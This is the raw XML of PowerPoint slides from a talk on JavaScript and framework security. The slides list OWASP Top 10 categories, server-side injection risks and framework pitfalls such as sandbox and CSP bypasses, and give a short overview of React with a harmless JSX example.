      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361147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Server-side JavaScript Security Concerns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414464"/>
            <a:ext cx="11321143" cy="4768622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>What about Node.js and full-stack frameworks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Server-side security concerns – same as for other languages:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Injection issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Path traversal, command injection, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>noSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>CSRF (mostly)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Remote code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>… and the rest of the OWASP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>These are not in our focus!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400548" y="2307773"/>
            <a:ext cx="4485166" cy="2191431"/>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lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Deserialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Quite common in JavaScript with the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166305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 Client-Side JavaScript with OWASP Top 10 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1843222131"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1390996" y="2064939"/>
          <a:ext cx="8121972" cy="4079240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6245046">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1876926">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>JavaScript</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Injection (SQL, Command, LDAP)</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Broken Authentication</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Sensitive Data Exposure</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XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> External Entities</a:t>
                      </a:r>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Broken Access Control</a:t>
                      </a:r>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Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> Misconfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>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Cross-Site Scripting</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Insecure</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> Deserialization</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="100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components with Known Vulnerabilities</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="100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Insufficient Logging &amp; Monitoring</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10010"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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3155293"/>
            <a:ext cx="514043" cy="36576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0635" y="2432775"/>
            <a:ext cx="514043" cy="365760"/>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2789523"/>
            <a:ext cx="514043" cy="36576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5794" t="19319" r="67063" b="21833"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8353307" y="3521063"/>
            <a:ext cx="519765" cy="36576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3886833"/>
            <a:ext cx="514043" cy="36576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4252603"/>
            <a:ext cx="514043" cy="365760"/>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4618373"/>
            <a:ext cx="514043" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8442309" y="4984143"/>
            <a:ext cx="341760" cy="400110"/>
            <a:chOff x="10505943" y="3466958"/>
            <a:chExt cx="341760" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10505943" y="3466958"/>
              <a:ext cx="341760" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10539663" y="3532131"/>
              <a:ext cx="274320" cy="2743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8995" t="18721" r="84127" b="23980"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8356168" y="5384263"/>
            <a:ext cx="514043" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8436776" y="5750542"/>
            <a:ext cx="341760" cy="400110"/>
            <a:chOff x="10505943" y="3466958"/>
            <a:chExt cx="341760" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10505943" y="3466958"/>
              <a:ext cx="341760" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10539663" y="3532131"/>
              <a:ext cx="274320" cy="2743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874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JavaScript Frameworks Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3863372338"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1820672" y="1579202"/>
          <a:ext cx="8550656" cy="3874736"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4275328">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3340413873"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4275328">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2341601385"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="430496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Built-in security features</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Frameworks insecurities</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4258492060"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2653742">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Contextual encoding and templating engines</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>CSRF protection – client-side part</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Type checking</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Sandbox (not a security feature)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Whitelists (for resources, etc.)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Expression injection</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Sandbox bypasses</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Insecure APIs</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>CSP bypasses</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1877563465"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20157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React</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1507443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React?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466905" y="6144157"/>
            <a:ext cx="5219896" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://npmcharts.com/compare/react,vue,angular</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7478" y="1295932"/>
            <a:ext cx="10737044" cy="4848225"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412734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History</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>React was introduced in May 2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In 2013 AngularJS was super popular</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>New features:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One-way binding &gt; unidirectional flow &gt; scalability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virtual DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Angular 2 is announced – Sept 2014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Angular 2 is released in 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>React is backed by Facebook</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99" y="991441"/>
            <a:ext cx="5902463" cy="4173226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2064943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 Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2327478"/>
            <a:ext cx="5429693" cy="2797415"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Framework or Library </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Not opinionated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Agnostic about concerns like routing and state management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Vibrant and diverse ecosystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Functional programming principles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5167422" y="1708814"/>
            <a:ext cx="6713697" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>"a JavaScript library for building user interfaces“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1151509964"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7184572" y="2327478"/>
          <a:ext cx="4522376" cy="2029744"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4522376">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="866628668"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="862678">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>function</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> Square</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props</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return</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&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>button </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>className</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"square"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>            </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>onClick</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props</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onClick</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props</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value</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&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>button</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>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3614659446"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
